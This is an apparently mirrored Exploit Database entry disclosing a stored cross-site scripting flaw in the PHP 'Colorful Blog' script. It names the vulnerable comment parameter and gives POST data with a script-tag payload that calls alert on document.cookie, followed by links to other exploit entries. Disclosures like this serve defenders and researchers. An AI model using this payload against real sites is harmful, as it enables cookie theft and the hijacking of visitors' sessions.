Colorful Blog – Persistent Cross-Site Scripting

Exploit Database
15 阅读

作者： Besim

日期： 2016-10-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40526/

# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : -----------------: Besim
# Google Dork : ---------:-
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html


Description : 

# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'

*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-* 

*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'--- Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA:adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post

last Exploits
Colorful Blog – Persistent Cross-Site Scripting的更多信息

Joomla! Component FDione Form Wizard 1.0.2 – Local File Inclusion：
Joomla! Component JS Jobs 1.0.5.8 – SQL Injection：
Smart PHP Poll – Authentication Bypass：
Joomla! Component com_aml_2 – ‘art’ SQL Injection：
DA Mailing List System 2 – Multiple Vulnerabilities：
Departmental Store Management System 1.2 – SQL Injection：
SonicWALL OEM Scrutinizer 9.5.2 – Multiple Vulnerabilities：
eBlog 1.7 – Multiple SQL Injections：